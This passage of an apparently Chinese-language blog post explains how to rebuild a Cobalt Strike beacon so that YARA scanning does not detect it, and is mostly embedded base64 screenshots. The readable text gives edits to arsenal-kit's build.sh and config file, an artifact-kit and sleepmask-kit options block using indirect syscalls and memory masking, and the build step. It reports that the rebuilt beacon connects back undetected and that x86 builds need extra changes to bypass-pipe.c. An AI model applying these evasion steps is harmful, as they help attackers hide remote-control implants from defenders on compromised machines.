6RUJJ6yTs3xNwT12u30MQhpbxNevRluC7/jl5rA+i0GT0tCy3TLG14/XcibrsK7cCDyYmJ5VWs2xDFpdVUJth7uDZ0orijvUIeoP6vdFx71W/8vwWT39z/+suAADU1KC/8SlmR4+XLMGpihMi3H5F76BuQ96rcKKoJ1nT65tcpjdv4FwyZWHqw50mISnoTeoViTezwaw5JvXaX04rUgEAgEGwD6PswRj3KJa2orxm9a7NLTla866ZHb2bjvgZqwBbaY9J866GNjtz35/eGu1RnrGT2mM4GY+vus1+9Y3gKsXAyvPheFWi33aAgiVlFBB8b2BtmDDz9AX0ZnoAgLqqjOCwkIOJKSlfK6taG3eapKyO6rDFk/joyB1iiUg0sOa3a9XZaZLdDXVN11nzrDqqcqO8bt8OTGtt9Kld+qgMXTV9ZouUiJouew2SqOva5IRb++88/qeo7Lt5pXZRVtSwM51JbPIYX7Ni99xrU9SmAY/neGt+JF/3+dHjWz7xCU8Lv7RR+BSajJ6a6ZyxVqsMtHid3CQSaf9eIxZPtXXWVRTwJBeZNlOa4nsn4OyrjHesRRKTUFDSWzLOftMvXN6RvOIiUftN6lFgtk84HbOqOOnE/aCzb7I/Vla3juyhSEnL62tz7GvZmW8QPgWA2vgt/VoLmjrUzVT5SgRCYrklhQA/ljcFg6x6ww2Ug/QqMwWATWFnpzwjEdpenJOWDQZts0oQpqCQ/UWbtwMZ60pfbT17/EDWN7ZBZH1FZV5U7GXz2EDNob9HOY5QJyWk2uTHvrY34z/UEQxKG2pLP6cev5t6/L5EXwOHkIXjDYjbe311RREyfXxV48szct8EzPbnloC/+ZsOV+5Fsh151vKoitKsaxFnrkVcUNGy/mu
</p>
<p>当然，如果你不想使用多余的套件，可以自行反编译修改并打包原始beacon.dll进行</p>
<p>我这边就演示在bypass-pipe.c中进行修改，注释部分的是Artifact Kit中默认的，该方法也已经被yara标记了，我做的只是简单的字符串隐藏</p>
<p><img loading=lazy src=data:image/png;base64,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
</p>
<p>因为使用了arsenal-kit中的artifact-kit和sleepmask-kit，所以直接修改arsenal-kit配置文件生成一个套件即可</p>
<p>修改的位置如下：</p>
<ul>
<li>/arsenal-kit/kits/artifact/build.sh:49-51行，给它注释掉就不会报错了</li>
<li>/arsenal-kit/arsenal_kit.config:16行，设置include_sleepmask_kit=“true”，因为还启用了sleepmask-kit</li>
</ul>
<p>接下来是Artifact kit options和Sleepmask kit options，根据实际情况修改即可</p>
<pre tabindex=0><code>#### Artifact kit options
artifactkit_technique="pipe"
artifactkit_allocator="HeapAlloc"
artifactkit_stage_size=310272
artifactkit_include_resource="false"
artifactkit_stack_spoof="false"
artifactkit_syscalls_method="indirect"

#### Sleepmask kit options
sleepmask_version="49"
sleepmask_sleep_method="WaitForSingleObject"
sleepmask_mask_text_section="true"
sleepmask_syscalls_method="indirect"
</code></pre><p>运行/arsenal-kit/build_arsenal_kit.sh生成即可，生成后的路径为/arsenal-kit/dist/</p>
<p><img loading=lazy src="data:image/png;base64,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
</p>
<p>加载该套件，重新生成beacon，运行上线，使用yara对进程进行检测，可以看到和shellcode loader上线一样是检测不到的</p>
<p><img loading=lazy src="data:image/png;base64,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
</p>
<p>以上是x64的修改，x86也同样适用，不过x86需要额外修改一下2个位置</p>
<ul>
<li>
<p>/arsenal-kit/kits/artifact/src-common/bypass-pipe.c中的DWORD server_thread(LPVOID whatever) 方法</p>
<p>打乱一下它的结构就行</p>
<p><img loading=lazy src=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAA74AAAF9CAIAAACs/yNlAAAgAElEQVR4nOzdd1xT1xcA8PPeyw4hJCwBRWW4RcC9tdatuEeto/60w9bZZWu1jtq62mpbbeuso1rrrltxiwwVUBAVRWSTMMLIHu+93x9gRSUhKCjY8/34h5/Hy8m59wZycnPffYSvfwAghBBCCCGEKkK+6gRQ7UM6NQ5syH/VWfwXEU6NgnwErzoLhBBC6L8LS+faiODyucRLeSZKIHjqmQhpm083/vTbp73cXp/XzsvrzxfDaTZ+3uYtS8f7V+Jzi9B/wOI//rwctXd+O271ZYYQQgj9R7w+5c9/Bek+dtPJqF8Hub6MoeO0+GjLtcvzevAeHaDqjl6+8G2niCVLTuYwLyGB6vdS+/MFWRI2LV2X2vyT1dO7Su0s9cU9P5w1zDNl85eLt962VG92CCGE0H+AffWCyGfoVz8fDwuNvvL3jsUDGwtLH+v73qab8ZcSSv9djP1tgNOzb+jCXmuuX0qIu3gz6p/TB35eNb2nr4gATuBXoecvL2pbdh6M2/WL8Oi1EzxJEDYYPG/N8bDQG1cPHvjpf93qcAAAKL/pB84nxF+6FXchNuLgkc1fTGojJ63Ff00Qsjfn7D70zSiPssNE8fmcl1nmkVwO59F/6wyZMbuj4fA3q08qHxfO4kHfxdz46/NAzpOPEw76KTQh/lJC3IW4q0dO7/r244ENRYTozWVH4q8uD/m38iOcR28MjTs4pRkF5Y87IR+1/kzC45fZpfgLn3XiVuG4P0d/ljsuL4Uhaev8jdHOg+ZPDxbb9QCWICg69erR87cyNGw1J4cQQgi9/ux47yekPeetXNKPOLvi609XXxf1/+Tnj1uL/v2p4fpPUz6aMPGjCROnT1x+uaj8d2dGdXHj5wt/33mNDp68cPuaoQ2JvCwlI5bJ+KTzoKVbDu36sCOPkLi6CIyKTJWk51ervh0ii9u6esEPJ/Oaj1+z9p2AR19QW+7u++z9z2Yv/uumY49P1y4a502WH5960X6pGQieS4Mm3nJhDZkQpfxGT2jHi939e1ixnVUYk3d55fS5MxdsOlnceNK3Py7qzb9++aaO37xD0KN5bIeADs05WVeu3mOk5Y87q7ny28KZs5buuGVhCiJ+/virWfMP3qVLw7+icX+V40KnH/v1QLbH4NF9Xez5qGBSKgvA2dmlhryEEEIIoVqu4ndUQtZlTF/5g79+WnMk4vy+X34+rfboP6DTv7UzU5h8Iz4mNj4mNj4+VW2totKn3zx78sS2ZZ+9++sdYfuJUzvpshQ0KXdy4no2C67XwK+5vyvH1d0ZFNlK9z6T+7k83LlswabjR/7e8NmKC3q/IW93LX0+tjg9OuraxZN7lvxwJl/YrGdHGVFu/C5CWy1ybPLW0nWnwkJvXj9+Zve3nwzyEZdEIZ3bTVm4O/REzLXDR36b1rsuFwCAkA7/7UxC/IULC9q6tZv8+9HjN26GrguRcJpNPXzj7PbxdUp6kGo8+UDsqXUhTkQl41gtfyR91l6/cO6rIC635dyTFxLiz+2eWv9xZUi5dJm27J9LZ6IvbVk60JOyHb/cfICsP2D2hn37I6PPxV7Zu+vboc0dSnMhpAFT12wNu3r68p75o/wfX5RG+XTs3oC5FRqWbfdSDdaYHRcedeHUP6vnbgozyXv0DjBGhscYJa3bNiqZo+a1aB0sUl25lMh4Wht3U9aNK2fPhd/Oo1lDVvT5y+fCklSPErB33En38VvPxvzUx6HMIa+J62LDvuzOs9Kf1vrHxriU189U1b9OjHFnwhWCoJ4drL94HmNUuQXg7CzH0hkhhBCqChW/o5Ienp5cOiMtiwYAMCUlZjDiho28Hj2Q32r6roPXY06f3T6zjxfHRhwAALCknrl8j5G1aeedp8gDJ5lM6FHX4WFCiryuB8eljpxVZhe1DGzGLYy99sAMAMAWR8ck0JKgYN+nQjNmk5klKJIiy